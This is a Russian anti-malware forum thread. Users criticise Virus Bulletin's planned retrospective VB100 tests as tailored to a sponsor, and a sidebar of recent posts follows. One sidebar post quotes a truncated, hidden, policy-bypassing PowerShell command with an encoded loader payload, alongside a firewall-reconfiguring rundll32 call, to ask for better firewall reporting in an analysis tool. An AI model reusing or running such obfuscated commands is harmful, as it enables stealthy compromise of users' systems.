Перейти к содержанию
Иван

VB testing - present status, future plans John Hawes, Virus Bulletin

Recommended Posts

Иван

http://www.virusbtn.com/conference/vb2008/...LastMinute1.xml

VB's unique VB100 comparative review system has been around for 10 years, and has seen few changes in its core design since its 1998 inception. Over the last few years, VB has introduced a range of additions to the data produced in each test, including significant redesigns of the speed tests and 'zoo' collections.

Now, for the first time in 10 years, VB plans to introduce a major new addition to these tests. The new test is based around a system of weekly test sets which cover the three weeks immediately prior to product freezing as well as one week after. The test is designed to measure the ability of AV labs to keep up with the 'flood' of new malware, as well as introducing measurements of heuristic and generic detection abilities, through the element of retrospective testing. We hope it will show some interesting trends over time.

This presentation will focus on the latest addition to the testing line-up. We'll look at how and why these changes have been designed and implemented, and some of the problems involved, and will also cover further plans for expansion and improvement in the future.

походу VB решил внести таки изменения в свою методику

прикольно то, что изменения эти явно опять сделаны под их платинового спонсора, сильная сторона которого эвристика:)

а поведенческие проактивные методы и хипсы опять не будут учитываться...оригинально

да и еще интересно будут ли результаты этих новых ректроспективных тестов влиять на получение VB100% или тоже как с троянами это будет факультативным результатом

вот бы презу целиком посмотреть

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
dan

Ещё мне очень понравилось, что из всего потока отложенной малвары будут выбираться только 10 самых популярных семейств ;) .

Видимо по классификации платинового спонсора. Особенно было забавно, что перед этой презентацией на столах разложили ЕСЕТовский отчёт по угрозам 2007 года.

В этом отчёте по каждому месяцу как раз и писаи о распространённости ТОП10 угроз по версии ЕСЕТ.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Иван
Ещё мне очень понравилось, что из всего потока отложенной малвары будут выбираться только 10 самых популярных семейств ;) .

Видимо по классификации платинового спонсора. Особенно было забавно, что перед этой презентацией на столах разложили ЕСЕТовский отчёт по угрозам 2007 года.

В этом отчёте по каждому месяцу как раз и писаи о распространённости ТОП10 угроз по версии ЕСЕТ.

ну и какой прогноз, сколько в ЛК еще на осознание и размышления по поводу вб100 нужно :rolleyes:

полгодика али год?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Сергей Ильин
да и еще интересно будут ли результаты этих новых ректроспективных тестов влиять на получение VB100% или тоже как с троянами это будет факультативным результатом

Насколько мне известно критерии присуждения наград VB100% пересматриваться не будут.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×